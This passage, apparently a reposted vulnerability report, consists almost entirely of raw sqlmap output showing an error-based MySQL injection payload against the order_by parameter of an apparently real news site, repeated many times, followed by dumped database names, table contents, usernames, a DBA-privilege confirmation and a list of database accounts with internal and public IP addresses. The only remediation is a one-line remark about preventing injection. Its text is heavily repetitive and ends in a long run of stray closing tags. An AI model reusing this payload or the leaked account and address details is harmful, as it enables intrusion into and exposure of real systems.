the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: apphistory_news<br>[5 tables]<br>+-------------+<br>| figure	|<br>| hot_tag	 |<br>| relate_news |<br>| relate_pic|<br>| stats	 |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_weather<br>[5 tables]<br>+-------------+<br>| abroad	|<br>| airport	 |<br>| internal	|<br>| nephogram |<br>| relate_news |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>[23 tables]<br>+-----------------------------+<br>| hash						|<br>| hdphoto					 |<br>| ip_test					 |<br>| lianghui_2010			 |<br>| lianghui_2010_copy_20100226 |<br>| lianghui_2010_lhyl		|<br>| lianghui_2012			 |<br>| lianghui_2012_lhyl		|<br>| special_diqiuyixiaoshi2010|<br>| special_martyr			|<br>| special_qinghaiyushudizhen|<br>| special_xinanhanzai		 |<br>| timeline					|<br>| tw_vote					 |<br>| upload					|<br>| upload_20121116			 |<br>| upload_v					|<br>| user_test				 |<br>| vote_category			 |<br>| vote_detail				 |<br>| weather_yb				|<br>| weather_yb_tomorrow		 |<br>| weather_zh				|<br>+-----------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: user_test<br>[2 entries]<br>+----+--------------+------+---------+-------------+---------------------+<br>| id | ip		 | lock | intro | username	| rec_time			|<br>+----+--------------+------+---------+-------------+---------------------+<br>| 1| 220.181.24.2 |	| <blank> | wangyun1127 | 2010-05-10 14:27:06 |<br>| 2| 220.181.24.2 |	| c100	| c100		| 0000-00-00 00:00:00 |<br>+----+--------------+------+---------+-------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: hash<br>[10 entries]<br>+----+--------------+--------+<br>| id | name		 | value|<br>+----+--------------+--------+<br>| 1| ygdx_gd	| 258	|<br>| 2| ygdx_bsd	 | 306	|<br>| 3| ygdx_zmd	 | 57	 |<br>| 4| ygdx_time	| 5月8日 |<br>| 5| wudu2010_hlb | 198864 |<br>| 6| wudu2010_szc | 150782 |<br>| 7| wudu2010_wyc | 0	|<br>| 8| wudu2010_xsh | 0	|<br>| 9| wudu2010_wwm | 0	|<br>| 10 | wudu2010_zll | 358715 |<br>+----+--------------+--------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: lianghui_2012<br>[10 entries]<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| id | type | title | verify | delete | cai_num | content | ding_num | user_name	| user_type | click_num | debate_num | submit_time		 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| 1| 1	| 1	 | 1	|		| 2	 | 1	 | 3		| kuaibo_10501 | 1		 | 7		 | 0		| 2012-02-28 17:44:30 |<br>| 2| 1	| 11	| 1	|		| 0	 | 1	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:47 |<br>| 3| 1	| 2	 | 1	|		| 0	 | 2	 | 1		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:54 |<br>| 4| 1	| 3	 | 1	|		| 0	 | 3	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:46:59 |<br>| 5| 1	| 4	 | 1	|		| 0	 | 4	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:05 |<br>| 6| 1	| 5	 | 1	|		| 1	 | 5	 | 0		| kuaibo_10501 | 1		 | 0		 | 0		| 2012-02-29 15:47:09 |<br>| 7| 1	| 5	 | 1	|		| 1	 | 5	 | 20	 | kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:17 |<br>| 8| 1	| 6	 | 1	|		| 0	 | 6	 | 5		| kuaibo_10501 | 1		 | 107	 | 0		| 2012-02-29 15:47:22 |<br>| 9| 1	| 7	 | 1	|		| 0	 | 7	 | 91	 | kuaibo_10501 | 1		 | 235	 | 0		| 2012-02-29 15:47:26 |<br>| 10 | 1	| 8	 | 1	|		| 2	 | 8	 | 2		| kuaibo_10501 | 1		 | 97		| 0		| 2012-02-29 15:47:31 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA:	'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'</blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></code>
Nach dem Login kopieren

修复方案:

还是防注入吧

Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage